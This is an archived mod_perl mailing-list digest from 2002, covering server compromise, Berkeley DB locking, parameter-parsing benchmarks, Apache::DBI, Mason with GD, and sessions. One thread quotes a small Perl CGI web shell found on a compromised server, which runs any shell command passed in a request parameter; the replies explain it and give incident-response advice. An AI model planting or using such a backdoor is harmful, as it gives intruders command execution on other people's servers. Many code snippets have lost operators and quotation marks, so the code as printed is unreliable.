Hi there, On Thu, 21 Mar 2002, John Michael wrote: Any idea as to how it got on my server. Nope. There are a thousand ways it could have been done if your server is not carefully secured. Do waht Perrin said - take it offline, it can't be trusted - and read the CERT stuff that you've been pointed to by another useful reply. The server probably has a dozen back-doors in it now so it would be irresponsible to leave it on line. Unless you *really* know what you are doing from a security point of view (and without meaning to be offensive it sounds vey much like you don't) you should wipe the discs and reinstall the OS and server(s) from scratch. Then do some serious reading about securing your server. Don't run any daemons you don't have to run, especially ftp and sendmail, if you aren't sure of them. 73, Ged.
Re: modperl and SQL db select
On March 21, 2002 01:05 pm, Dave Rolsky wrote: On Thu, 21 Mar 2002, Jay Thorne wrote: The first one I noted was that he assumes that a high performance app has several joins. I think everyone here who's developed a few db apps will tell you that joins are hugely costly and should be avoided for an application's most common cases. Actually, I've developed _more_ than a few DB apps and I'd tell you that joins are not only _not_ hugely costly, but can sometimes be a performance improvement. It really depends on a lot of factors including what RDBMS you are using, how many connections you have, ratio of reads to writes, how complicated the joins are. But a blanket statement like that is flat out wrong. Okay, now I need an example. I've never seen a query on any db where a single table query was slower than a two table join. Of course, I'm biased here, since my knowledge of the more bizarre db's is limited. I've only seen things like sybase, oracle, mysql, postgres and mssql. -- Jay yohimbe Thorne [EMAIL PROTECTED] Mgr Sys Tech, Userfriendly.org
Re: modperl and SQL db select
Please, please, please KILL THIS THREAD!
Re: modperl and SQL db select
Hi all, On Thu, 21 Mar 2002, Perrin Harkins wrote: Please, please, please KILL THIS THREAD! I second that. It's all been done before guys. 73, Ged.
Re: modperl and SQL db select
On Thursday, March 21, 2002, at 01:05 PM, Dave Rolsky wrote: Further on, he was discussing threaded discussion forums and assumed a recursive query. While recursing the DATA is probably (though provabably not always) necessary, there is no need to storm the db with that many queries, since query setup time, queing, and results extraction have noticable time penalties. Extracting the data with a single query and recursing it in RAM is a much more db and cpu friendly idea. This I can agree on, though it is more a limitation of SQL, which provides no meaningful way to do a recursive query. Vanilla SQL, perhaps, but not Oracle's flavor! CONNECT BY PRIOR :-) -- -- Tom Mornini -- eWingz Systems, Inc. -- -- ICQ: 113526784, AOL: tmornini, Yahoo: tmornini, MSN: tmornini
Re: 0 being appended to non mod_perl scripts.
Mike == Mike Wille [EMAIL PROTECTED] writes: Mike I am encountering a wierd problem where perl scripts running under a normal Mike cgi-bin (ie no mod_perl) have a '0' appended to the output. I've seen this happen when people mistakenly write: print system foo; instead of print `foo`; but of course they should have written: system foo; instead. As to why it's not happening in an Apache::Registry script, I cannot say. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 [EMAIL PROTECTED] URL:http://www.stonehenge.com/merlyn/ Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
Dan Wilga wrote: If I either use DB 3.x or even run this from the commandline (bypassing mod_perl) under DB 4 the problem goes away: only one locker is allocated per loop, and therefore the total number used does not increase unexpectedly. This sort of begs the question: why not use DB 3.x? Is there some new feature you need in DB 4? It's been a little while since I messed with this stuff, but I don't think you need to tear down the Env each time. I think you can just create it the first time and reuse it after that. Maybe that will help. (Ah, Mount Holyoke. As a Five College alumn, I remember it well.) - Perrin
Re: Off topic question a little worried
At 4:58 PM -0500 3/21/02, darren chamberlain wrote: Another alternative is to replace it with something that appears to do the same thing, but actually logs a ton of stuff from the requestor. Unless the entire site has already been backdoored. If that is the case, then this would serve no purpose, as the intruder could just come in via the backdoor. Any time a security breach takes place, the first action should always be to take the box offline and access the extent of the breach (multiple machines may be effected), backup the disk(s), and reformat. Finally, restore only the trusted files (and only after reviewing them for backdoors). It's the only way to be sure that you've eliminated the problem. Rob -- When I used a Mac, they laughed because I had no command prompt. When I used Linux, they laughed because I had no GUI.
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
At 1:32 PM -0500 3/21/02, Perrin Harkins wrote: Dan Wilga wrote: If I either use DB 3.x or even run this from the commandline (bypassing mod_perl) under DB 4 the problem goes away: only one locker is allocated per loop, and therefore the total number used does not increase unexpectedly. This sort of begs the question: why not use DB 3.x? Is there some new feature you need in DB 4? I'm having problems with minor DB corruption in the last release of 3.x (3.3.11), so I wanted to try 4. It's been a little while since I messed with this stuff, but I don't think you need to tear down the Env each time. I think you can just create it the first time and reuse it after that. Maybe that will help. I tried that, believe me :-). I only did it this way in the test script to show that the problem occurs despite that bit of extra caution. (Even the undefs are probably not needed, but are there for clarity.) What surprises me is that all I have to do to introduce the problem is run it under mod_perl. It acts normally when run from the commandline. (Ah, Mount Holyoke. As a Five College alumn, I remember it well.) :-) Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075Seduced by the chocolate side of the Force
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
Dan Wilga wrote: What surprises me is that all I have to do to introduce the problem is run it under mod_perl. It acts normally when run from the commandline. Well, let's see, what would be different... Is it possible that the problem is concurrency from multiple mod_perl processes? What happens when you run it with httpd -X ? Could there be a permissions issue involved? Are you sure you're only invoking the script once under mod_perl? If you raise the number of repetitions, does the command-line version exhibit the problem? I don't see any scoping issues in your script, but are you running it under Apache::Registry? Maybe the nested subroutines that creates are causing problems. - Perrin
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). I would re-write it as a handler and see if Apache::Registry is partly to blame. hth, aaron
Re: Off topic question a little worried
-- Perrin Harkins [EMAIL PROTECTED] on 03/21/02 17:07:27 -0500 darren chamberlain wrote: Another alternative is to replace it with something that appears to do the same thing, but actually logs a ton of stuff from the requestor. You can't trust any part of compromised box, right down to the 'ls' command. Once you know someone has been able to run arbitrary commands on your machine, they could have installed ANYTHING. They might have a rootkit, they might have replaced your ssh binary with something that mails passwords to them, they might be using your box as part of a DoS attack on someone else's site, they might be on your box running as root *right now*. You don't even know how they got on the box in the first place. Disconnect it. You can usually trust read only media (e.g., CDR's placed in a cdrom drive or mechanically write-locked floppy or mio discs). Booting a rescue cd or one you've burned after the insatll and before putting the box on line can allow you to check what's going on and at least back up the more useful portions of the system config files. You might also want to use rescue-cd util's to back up the logs and apache directories to try and track the schmuck to cracked you. Point is that even if you cannot trust anything at all on your hard drives at this point you can still analyze what's there and recover at least some of it. enjoi. -- Steven Lembark 2930 W. Palmer Workhorse Computing Chicago, IL 60647 +1 800 762 1582
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
At 1:55 PM -0500 3/21/02, Perrin Harkins wrote: Dan Wilga wrote: What surprises me is that all I have to do to introduce the problem is run it under mod_perl. It acts normally when run from the commandline. Well, let's see, what would be different... Is it possible that the problem is concurrency from multiple mod_perl processes? What happens when you run it with httpd -X ? The same (bad) results. Could there be a permissions issue involved? Nope, all the files get deleted and re-created in the script (and they do get created correctly). Permissions also wouldn't explain why the same thing works in 3.x. Are you sure you're only invoking the script once under mod_perl? Yes, I'm doing it by a direct URL. If you raise the number of repetitions, does the command-line version exhibit the problem? No, the commandline version never does. When run under mod_perl, the Current number of lockers reported by db_stat is always equal to the number of iterations, no matter how many are used. I don't see any scoping issues in your script, but are you running it under Apache::Registry? Maybe the nested subroutines that creates are causing problems. Ack. Ptooey. I just renamed the file to end in .cgi and the problem persists. I even removed mod_perl from my configuration files, and it still fails. I thought I had tested the before, but I guess not. This can only mean mod_perl isn't at fault. Sorry for the false alarm. I'll have to go back to Sleepycat with this new information. Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075 Who left the cake out in the rain?
Re: Apache::args vs Apache::Request speed
I didn't ever actually see a post with newer numbers, so here goes.. I tested the same 50 clients/5000 requests as stas' test in the guide. one pass with 2 uri params; another with 26. naturally I ran it all on a server big (and quiescent) enough to handle the 50 concurrent requests. I left out CGI since we already know it is slow. /test/params and /test/args are mod_perl handlers (I don't use Apache::Registry for anything) ParamsTest and ArgsTest respectively. the code for both handlers and the relevant pieces of ab output are pasted in below. - name query_length | avtime completed failedrps - apache_args 25 | 33.77 5000 0 1481 apache_request 25 | 33.17 5000 0 1507 apache_args 337 | 43.51 5000 0 1141 apache_request 337 | 45.31 5000 0 1103 -- Non-varying sub-test parameters: -- concurrency : 50 connections : 5000 so $apr-param is marginally faster than $r-args for the shorter query, marginally slower for the longer one. I think this may be because we can return the full hash $r-args whereas we need to map over $apr-param to get a hash (so param gets called three times for the short query, 27 times for the larger one). still, much closer numbers than the former test... - mark package ParamsTest; use strict; use Apache; use Apache::Constants qw( OK ); use Apache::Request; sub handler { my $r = Apache::Request-new( shift ); $r-send_http_header( 'text/plain' ); my %args = map { $_ = $r-param( $_ ) } $r-param(); $r-print( join( \n, map { join( '', $_ , ' = ' , $args{$_} ) } keys %args ) ); return OK; } 1; package ArgsTest; use strict; use Apache; use Apache::Constants qw( OK ); sub handler { my $r = shift; $r-send_http_header( 'text/plain' ); my %args = $r-args(); $r-print( join( \n, map { join( '', $_ , ' = ' , $args{$_} ) } keys %args ) ); return OK; } 1; Document Path: /test/params?a=eeb=ee Document Length:31 bytes Concurrency Level: 50 Time taken for tests: 3.317 seconds Complete requests: 5000 Failed requests:0 Broken pipe errors: 0 Total transferred: 883520 bytes HTML transferred: 155620 bytes Requests per second:1507.39 [#/sec] (mean) Time per request: 33.17 [ms] (mean) Time per request: 0.66 [ms] (mean, across all concurrent requests) Transfer rate: 266.36 [Kbytes/sec] received Connnection Times (ms) min mean[+/-sd] median max Connect:0 51.9 516 Processing:14274.6 2750 Waiting:9274.7 2749 Total: 14323.7 3254 Document Path: /test/args?a=eeb=ee Document Length:31 bytes Concurrency Level: 50 Time taken for tests: 3.377 seconds Complete requests: 5000 Failed requests:0 Broken pipe errors: 0 Total transferred: 883168 bytes HTML transferred: 18 bytes Requests per second:1480.60 [#/sec] (mean) Time per request: 33.77 [ms] (mean) Time per request: 0.68 [ms] (mean, across all concurrent requests) Transfer rate: 261.52 [Kbytes/sec] received Connnection Times (ms) min mean[+/-sd] median max Connect:0 51.8 518 Processing:12274.5 2863 Waiting:8274.5 2763 Total: 12323.7 3265 Document Path: /test/params?a=eeb=eec=eed=eee=eef=eeg=eeh=eei=eej=eek=eel=eem=een=eeo=eep=eeq=eer=ees=eet=eeu=eev=eew=eex=eey=eez=ee Document Length:415 bytes Concurrency Level: 50 Time taken for tests: 4.531 seconds Complete requests: 5000 Failed requests:0 Broken pipe errors: 0 Total transferred: 2810640 bytes HTML transferred: 2082885 bytes Requests per second:1103.51 [#/sec] (mean) Time per request: 45.31 [ms] (mean) Time per request: 0.91 [ms] (mean, across all concurrent requests) Transfer rate: 620.31 [Kbytes/sec] received Connnection Times (ms) min mean[+/-sd] median max Connect:
Apache::DBI or What ?
Hi, I was all happy and rolling along when I read this in the docs. With this limitation in mind, there are scenarios, where the usage of Apache::DBI is depreciated. Think about a heavy loaded Web-site where every user connects to the database with a unique userid. Every server would create many database handles each of which spawning a new backend process. In a short time this would kill the web server. I will have many different users, users as in database users. So am I just screwed and won't be able to keep connections open? Or maybe the idea would be to go ahead and let that happen, but timeout the connection in 5 mintues or so? That way I wouldn't have open connectoins from user bob from 5 hours ago still siting around. Or am I totaly not getting it at all? I am using Postgress, I am wondering how big DBs deal with this sort of thing. I am also wondering what the actual overhead is in starting the connection and if there is anything that I could to to limit that without validating a specific user. Last of all, I might not be posting this to the right place, but I hope so. It seems to me there is a grey area when it comes to Apache modules when you are using them with mod_perl. Or else I just don't know enough yet to see there is not a grey area :) Thanks, Eric http://www.kwinternet.com/eric (250) 655 - 9513 (PST Time Zone)
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
At 2:03 PM -0500 3/21/02, Aaron Ross wrote: I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). I would re-write it as a handler and see if Apache::Registry is partly to blame. Sorry, I figured out that the problem persists even when mod_perl is completely disabled, so the problem must lie in either Apache or Berkeley DB. (As a diagnostic, I think I'll try disabling mod_auth_db.* and mod_ssl, since they both use DB.) Thanks for the quick responses, folks! Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075 I have a bold and cunning plan - Baldric
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
OK, I'm an idiot who can't read. I was reading the wrong part of db_stat's output when I thought that running it with the .cgi ending also caused the problem. Turns out it doesn't. So I have not absolved mod_perl after all. It's definitely an interaction between it and DB 4. This is one of those times I really wish I could go back and edit my posts :-). Anyone reading this thread will now be seriously confused. So I'll try Aaron's suggestion of writing it as a handler. Any other suggestions are welcome. Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075 I have a bold and cunning plan - Baldric
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
At 2:03 PM -0500 3/21/02, Aaron Ross wrote: I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). I would re-write it as a handler and see if Apache::Registry is partly to blame. I tried doing it as a handler, using the configuration below (and the appropriate changes in the source) and the problem persists. So it doesn't seem to be Registry's fault. Location /dan SetHandler perl-script PerlHandler DanTest /Location source code #!/usr/bin/perl package DanTest; use strict; use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB ); my $dir='/home/httpd/some/path'; sub handler { system( rm $dir/__db* $dir/TESTdb ); foreach( 1..5 ) { my $env = open_env($dir); my %hash; my $db = open_db( TESTdb, \%hash, $env ); untie %hash; undef $db; undef $env; } print HTTP/1.1 200\nContent-type: text/plain\n\n; print `db_stat -c -h $dir`; print \n; } sub open_env { my $env = new BerkeleyDB::Env( -Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE, -Home= $_[0], ); die Could not create env: $! .$BerkeleyDB::Error. \n if !$env; return $env; } sub open_db { my( $file, $Rhash, $env ) = @_; my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree', -Flags=DB_CREATE, -Filename=$file, -Env=$env ); die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key; return $db_key; } 1; Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075Seduced by the chocolate side of the Force
Future versions
Hi, I noticed that your May be done list on www.apache-asp.org mentions an interpreter for VBScript. I have been asked to setup a Linux based corporate website, though my developers insist on using VBScript and ASP. I realise that this is a bit of a time -wasting question, but how certain is the May be done list of to dos? - should I wait for your apache module to include VBScript support, or am I going to have to work with something like Sun's Chilli ASP for apache/linux ? Many thanks for your time, Aaron Aaron Robertsmailto:[EMAIL PROTECTED] Technical Support Engineer Domicilium (IOM) Ltd. 32-34 Malew Street Castletown Isle of Man IM9 1AF Tel: 01624 825278 Fax: 01624 829525 http://www.domicilium.com
Re: Apache::DBI or What ?
Hello, EFI will have many different users, users as in database users. So am I EFjust screwed and won't be able to keep connections open? Do you mean users as in actual RDBMS level users? In other words, when you say database users you mean different username/passwords used from, say, a command-line SQL client? If your answer is yes then indeed, this is exactly the situation the Guide is talking about--you're screwed and probably shouldn't keep connections open. You'll have to incur a connect on each HTTP request. EFI am using Postgress, I am wondering how big DBs deal with this sort of EFthing. I am also wondering what the actual overhead is in starting the EFconnection and if there is anything that I could to to limit that EFwithout validating a specific user. In large DB projects where you expect high levels of concurrency I haven't heard of anybody using RDBMS-level users for authentication purposes. Humbly, Andrew -- Andrew Ho http://www.tellme.com/ [EMAIL PROTECTED] Engineer [EMAIL PROTECTED] Voice 650-930-9062 Tellme Networks, Inc. 1-800-555-TELLFax 650-930-9101 --
Re: Non-web use for Apache/mod_perl
Over the last year I've been slowly working on a similar system in my spare time (of which I have none). To do systems monitoring and reporting I'm using mod_perl on the front end and communicating with remote systems via XML::RPC. The XML::RPC server on the remote system runs local command via perl wrappers. These wrappers are now returning raw command output, but my next step is to have them convert it first to XML and then return it, where it can be stored in a DB (I use DB2) and/or processed by AxKit. I decided to go this way so I could delegate the customization of the local wrappers to other admins, because our site uses so many different platforms (AIX, Sun, linux, BSD, all stripes of Windows, OS/2, AS/400, OS/390, MacOS 9, MacOS X, etc etc). So far I've only been monitoring and reporting disk usage, just to get up and running. Bill
Re: Future versions
On Wed, 20 Mar 2002, Aaron Roberts wrote: Date: Wed, 20 Mar 2002 13:34:46 - From: Aaron Roberts [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Future versions Hi, I noticed that your May be done list on www.apache-asp.org mentions an interpreter for VBScript. I have been asked to setup a Linux based corporate website, though my developers insist on using VBScript and ASP. I realise that this is a bit of a time -wasting question, but how certain is the May be done list of to dos? - should I wait for your apache module to include VBScript support, or am I going to have to work with something like Sun's Chilli ASP for apache/linux ? Many thanks for your time, Aaron Aaron Robertsmailto:[EMAIL PROTECTED] Technical Support Engineer Domicilium (IOM) Ltd. 32-34 Malew Street Castletown Isle of Man IM9 1AF Tel: 01624 825278 Fax: 01624 829525 http://www.domicilium.com Aaron, Your question is specific to Apache::ASP only, so it might be better suited for their list. Still, I've used Apache::ASP in the past (and I've also had my dark days using M$'s ASP on IIS), so I might conjecture that Joshua probably won't ever fully implement VBScript (though I think I remember him talking about a VBScript-to-Perl converter). I shouldn't speak for Joshua, though. He may be planning to support VBScript. I might point out, however, that if your requirements include a Linux-based website, then you're going to have troubles with these developers [who] insist on using VBScript and ASP. If they're not interested in the enlightenment that comes from using Perl and Apache::ASP, then you'll probably have to lay down the dough for IIS. The short answer is probably Don't hold your breath for VBScript. I couldn't comment on Sun's product. Sorry. Try your question on the Apache::ASP list: http://www.apache-asp.org/support.html ky
[MASON] Using GD for dynamic graphics
Hi I would like to add some dynamic generated graphics to my site and find GD being the one to use. However I'm not sure _how_ to use it on my pages. I use HTML::Mason for content management and I am very happy and truly amazed of the powers in Mason, but when I tried adding some GD it got me puzzled. When I create a new GD::Image drawing whatever on it and trying to print it - it will be prepended to my html header for the page. I then tried to put it in $m-out to have in printed within Mason, but that simply printed the raw PNG in all its glory as text on screen. I tried fiddeling with content_type, but I guess that wont work if I set this after I have already printed something on the page - hence the content_type will not even be effective for that page. What I still miss doing/trying is making a seperate file/component which only job will be to make the PNG, but I don't really see what I would gain from that, because that will pretty much also just print a PNG within my HTML page. Like: html head /head body Some standard html text... %perl $m-content_type( image/png ); #my Mason/perl code for creating an image with GD. my $image = GD::Image(); #put something on image... been using both clean GD synopsis and some home cooked small widgets. print $image-png; #or $m-out( $image-png ); #or $r-print( $image-png ); $m-content_type( text/html ); /%perl Some more html text. /body /html Very simplified, but I don't have my code in front of me - sorry. I would assume that content_type in only good for setting in the header, but I don't see how I can mix in this PNG then. If GD could virtualle create a file I guess img src=% $image-png % would work... but that seems like a long shot when reading the man for GD :) Any help/hints will be greatly appriciate. Maybe I just need to look harder for more ressources, but I've already spent a lot of time on something that looks quite simple - but haven't shown results yet. Best regards Nicolai Schlenzig nicolai.schlenzig(at)got2get.net
Re: Off topic question a little worried
Chris Reinhardt wrote: On Thu, 21 Mar 2002, John Michael wrote: #!/usr/bin/perl use CGI qw(:standard); print header; my $k=param(g); my $a=param(s); if ($a || $k) { $l=`$k 21`; print start_form,textarea(g,$k,1,50); print submit(sc); print end_form; print pre($l); } print $ENV{SERVER_NAME}; It executes arbitrary commands as whatever your httpds run as. don't delete it, but add the -T flag #!/usr/bin/perl -T In addition for the hacker not being able to run anything and probably not understanding why, you will be able to check the logs to see what IP the script was called from and hopefully trace down the bugger. Of course as Tom Brown has whispered to my ear, you simply need to run your code with PerlTaintCheck On, without modifying the script. or taking it off depending on what you want to achieve. _ Stas Bekman JAm_pH -- Just Another mod_perl Hacker http://stason.org/ mod_perl Guide http://perl.apache.org/guide mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: modperl and SQL db select
Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ http://www.mysql.com/news/article-91.html This was an interesting article, even though it didn't compare postgres to the other databases being tested. All of the mod_perl sites we have worked on use MySQL, and we have never had any problems with it. The newest versions of MySQL (4.x) also add some functionality that might have made MySQL look a bit less tempting for a developer to use in the past. Marc Slagle Secure Level 559 Liberty Hill, 2W Cincinnati, Ohio, 45210 (513) 665 4931 http://www.securelevel.com
Re: [MASON] Using GD for dynamic graphics
On Wed, 20 Mar 2002, Nicolai Schlenzig wrote: When I create a new GD::Image drawing whatever on it and trying to print it - it will be prepended to my html header for the page. I then tried to put it in $m-out to have in printed within Mason, but that simply printed the raw PNG in all its glory as text on screen. I tried fiddeling with content_type, but I guess that wont work if I set this after I have already printed something on the page - hence the content_type will not even be effective for that page. What I still miss doing/trying is making a seperate file/component which only job will be to make the PNG, but I don't really see what I would gain from that, because that will pretty much also just print a PNG within my HTML page. First of all, there's a mason users list (http://www.masonhq.com/resources/mailing_lists.html). Second, you don't seem to understand how images in a web page works. When your browser sees img src=foo it makes a _seperate_ request for foo from the web server. The image is not somehow magically inlined in the page and served with the request for the page itself. What you need is a seperate top-level Mason component that generates the image. Use this as the value for the src attribute like img src=foo.comp?size=2. Then make sure that foo.comp prints the correct headers. And yes, you need to use $m-out, not print (this is documented in the Mason docs). /*== www.urth.org we await the New Sun ==*/
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). I would re-write it as a handler and see if Apache::Registry is partly to blame. I tried doing it as a handler, using the configuration below (and the appropriate changes in the source) and the problem persists. So it doesn't seem to be Registry's fault. Bummer. I wish I had a machine to test this code on, but i won't until the end of next week. it's ugly, but you could use Devel::Peek to look at why garbage collection isn't working, maybe there is a circular reference in BerkeleyDB. Ugh. Please keep me informed. -- Aaron
Session
Hi Thanks in advance for your reply. How can i maintain session informations without cookie , hidden variables through forms in Perl. Is there any separate Apache module is available? Regards K.Murugan
Re: Session
At 22:46 21.03.2002 -0700, Murugan K wrote: Hi Thanks in advance for your reply. How can i maintain session informations without cookie , hidden variables through forms in Perl. Is there any separate Apache module is available? You should look at Apache::Session. There are different ways to keep session, but most go with atleast a cookie to keep the session ID, and then keeps all the information in a database or other storage method. Of course, the session ID can be passed along in whatever way you want, through the query string, or as a hidden form value. -- Per Einar Ellefsen [EMAIL PROTECTED]
Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl
Does shutting down apache free up your locks? (As an aside, I'm not sure I'll ever get over undef being proper closing of a database connection; it seems so synonomous to free([23]). I expect something like $db-db_close() or something.) Ed On Thu, 21 Mar 2002, Dan Wilga wrote: At 2:03 PM -0500 3/21/02, Aaron Ross wrote: I'm testing with the Perl script below, with the filename ending .mperl (which, in my configuration, causes it to run as a mod_perl registry script). I would re-write it as a handler and see if Apache::Registry is partly to blame. I tried doing it as a handler, using the configuration below (and the appropriate changes in the source) and the problem persists. So it doesn't seem to be Registry's fault. Location /dan SetHandler perl-script PerlHandler DanTest /Location source code #!/usr/bin/perl package DanTest; use strict; use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB ); my $dir='/home/httpd/some/path'; sub handler { system( rm $dir/__db* $dir/TESTdb ); foreach( 1..5 ) { my $env = open_env($dir); my %hash; my $db = open_db( TESTdb, \%hash, $env ); untie %hash; undef $db; undef $env; } print HTTP/1.1 200\nContent-type: text/plain\n\n; print `db_stat -c -h $dir`; print \n; } sub open_env { my $env = new BerkeleyDB::Env( -Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE, -Home= $_[0], ); die Could not create env: $! .$BerkeleyDB::Error. \n if !$env; return $env; } sub open_db { my( $file, $Rhash, $env ) = @_; my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree', -Flags=DB_CREATE, -Filename=$file, -Env=$env ); die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key; return $db_key; } 1; Dan Wilga [EMAIL PROTECTED] Web Technology Specialist http://www.mtholyoke.edu Mount Holyoke CollegeTel: 413-538-3027 South Hadley, MA 01075Seduced by the chocolate side of the Force
Re: Poll for my site
You could run a small img though your while loop and have it place one next to the other (side by side) using your rowcount values. That would be one way. or you could try it with a foreach() as well. Mark -Original Message- From: GsuLinuX[EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Tue Mar 19 09:11:38 PST 2002 Subject: Poll for my site Hi again from Istanbul:) , I wanna make poll for some datas that we obtain from the users. For this, i know howto insert the datas to my sql database, make an average or something specific but how can i show the results as visual which has become very popular in web sites? thanx Derya ___ GO.com Mail Get Your Free, Private E-mail at http://mail.go.com